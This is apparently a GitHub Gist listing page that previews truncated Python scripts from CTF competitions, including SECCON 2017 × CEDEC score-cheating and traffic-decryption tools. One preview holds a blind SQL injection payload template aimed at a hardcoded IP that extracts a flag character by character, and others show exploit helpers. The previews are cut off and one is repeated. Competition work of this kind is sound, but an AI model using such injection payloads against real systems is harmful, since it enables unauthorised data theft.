st98
/ cheat_score_2.py
Last active
September 4, 2017 02:44
SECCON 2017 × CEDEC CHALLENGE - スコアのチート 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import json | |
| import sys | |
| import urlparse | |
| import requests | |
| from Crypto.Cipher import AES | |
| def xor(a, b): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import json | |
| import sys | |
| import urlparse | |
| import requests | |
| from Crypto.Cipher import AES | |
| def xor(a, b): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import json | |
| import sys | |
| import urlparse | |
| import requests | |
| from Crypto.Cipher import AES | |
| def xor(a, b): |
st98
/ mitmproxy_decrypt.py
Last active
September 4, 2017 02:44
SECCON 2017 × CEDEC CHALLENGE - 通信の復号を行うスクリプト (デモ: https://www.youtube.com/watch?v=PGL6lmuB7DI)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # mitmdump -s mitmproxy_decrypt.py | |
| import hashlib | |
| import json | |
| import sys | |
| from mitmproxy import ctx | |
| from Crypto.Cipher import AES | |
| def xor(a, b): | |
| res = '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import requests | |
| import urlparse | |
| from bs4 import BeautifulSoup | |
| def is_number(s): | |
| if not s.isdigit(): | |
| raise argparse.ArgumentTypeError('{0} is not a number'.format(s)) | |
| return s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import urlparse | |
| from bs4 import BeautifulSoup | |
| def is_number(s): | |
| if not s.isdigit(): | |
| raise argparse.ArgumentTypeError('{0} is not a number'.format(s)) | |
| return s | |
| def get_content(url, team): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import sys | |
| class Stack: | |
| def __init__(self): | |
| self.stack = [] | |
| def append(self, v): | |
| self.stack.append(v) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import urllib.parse | |
| def check(s): | |
| return b"Don't let your dreams be dreams!" in s | |
| url = 'http://78.46.224.75/quote/' | |
| query = '(select substring(y from {} for 1) <= binary 0x{:x} from (select * from (select 1 u)a join (select 2 x)b join (select 3 y)c join (select 4 z)d union select * from flag)f where y like 0x253333433325 limit 1)' | |
| i = 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| from subprocess import * | |
| def p64(x): | |
| return struct.pack('<Q', x) | |
| def u64(x): | |
| return struct.unpack('<Q', x)[0] | |
| def read_until(f, s): |